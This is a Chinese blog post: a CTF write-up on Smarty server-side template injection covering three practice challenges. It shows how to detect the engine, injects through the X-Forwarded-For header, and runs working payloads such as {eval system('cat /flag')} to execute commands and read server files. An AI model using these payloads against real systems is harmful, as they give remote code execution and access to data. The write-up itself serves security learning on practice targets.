CTF题型 SSTI(3) Smart SSTI 例题和题记

最新推荐文章于 2024-04-14 22:20:04 发布
最新推荐文章于 2024-04-14 22:20:04 发布
阅读量453 收藏 11
点赞数 11
分类专栏: CTF考点刷题总结 文章标签: 网络安全 web安全 安全 php 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39947980/article/details/136711397
版权

CTF题型 SSTI(3) Smart SSTI 例题和题记

文章目录


前面我们学习了Flask SSTI

Smart SSTI和Flask SSTI 不同

Smart SSTI 是基于php的,居然可以在其中直接执行任意的php代码

参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/

这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693

标签{eval}执行任意php代码

特征

如何判断 SSTI模板注入的类型

image-20240314142839888

1.${7*7}

2.a{*test*}b

1.[CISCN2019 华东南赛区]Web11

buuctf上有环境

image-20240314141501813

页面暗示我们 Build With Smarty

考虑 Smart SSTI 漏洞

整个页面都是 IP 注入点可能是请求头X-Forwarded-For 可以测试一下

image-20240314141633863

判断是Smart 1.${7*7}

image-20240314143029036

2.a{*test*}b

image-20240314143128307

确实是 Smart漏洞

image-20240314143533872

{eval phpinfo()} 注意这里没用分号闭合

{eval system('cat /flag')}

在源码中可以找到flag

image-20240314144634100

2.[HDCTF 2023]SearchMaster

环境:https://www.nssctf.cn/problem/3785

image-20240314145728734

image-20240314145900541

可以判断为Smart SSTI注入

{eval system('cat /f*')}

image-20240314150118555

3.[NISACTF 2022]midlevel

环境 https://www.nssctf.cn/problem/2023

和[CISCN2019 华东南赛区]Web11 一模一样

环境 https://www.nssctf.cn/problem/2023

和[CISCN2019 华东南赛区]Web11 一模一样

可以练习一下熟练度

J1rrY_
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SSTI
03-09
SSTI
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5577
“百度杯”CTF比赛 十一月场 Web:Fuzz python SSTI模板注入
CTF SSTI(1) Flask-SSTI-labs 通关
qq_39947980的博客
03-13 1395
CTF SSTI(1)基础必过 学会自己手动构造payload
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 725
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问。,那么页面上就会显示。
2022恐龙杯Web复现
姜小孩的博客
04-08 899
2022恐龙杯 Be Smart easy_php
[CISCN2019 华东南赛区]Web11 1
shinygod的博客
03-23 2612
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2539
ssti注入
CTF中Web各种目的解姿势
05-25
WebCTF中常考之一,它将实际渗透过程中的技术技巧转化为CTF,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类,是快速掌握出人思路的一种有效的方法。
Bugku CTF——WEB之SSTI学习笔
qq_51096893的博客
12-19 4144
目录 知识前提 一.目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF目类(我们今天讲解的是WEB类中注入问): 1.MISC(Miscellaneous)类,即安全杂项,目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3153
0x01 前言 最近在刷的过程中发现服务端模板注入的目也比较常见,这类注入目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能框架,通常用于编写大的网站。
ctfweb总结大全(例题wp都有)
04-17
欢迎关注hacking水友攻防实验室,更多内容都在微信公众号
CTF简介,帮助了解CTF
09-12
CTF夺旗赛介绍用ppt,CTF简介,各种CTF简介,各种对应的典竞赛工具简介,入门可看,希望能帮助到大家
CTF MISC安全杂项经典例题讲解
10-22
该内容为CTFMISC安全杂项经理例题讲解,包含图片隐写,流量分析,web安全等多种讲解,图文结合,适合新手学习。
ctf拼图例题-puzzle
04-13
关于puzzle例题的原资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
ctf_show笔篇(web入门---SSTI
whale_waves的博客
04-08 915
模板引擎是为了让用户界面以及业务数据分离开才产生的,模板引擎会生成特定的文档,然后通过模板引擎生成前端html代码,然后再获取用户数据再放到渲染函数里渲染,最后将生成的html代码个渲染好的数据结合拿给浏览器呈现给用户。
CTFSSTI模板注入漏洞
ZhangAweio的博客
05-29 685
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类和请求的指令发送给对应Model业务模进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 271
SSTI
rsa ctf python3 脚本
08-14
CTF比赛中,通常会出现RSA,要求编写Python3脚本来解决该问。 以下是一个示范的Python3脚本,用于解决RSA CTF: ```python import binascii import gmpy2 def rsa_decrypt(c, p, q, e): n = p *...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值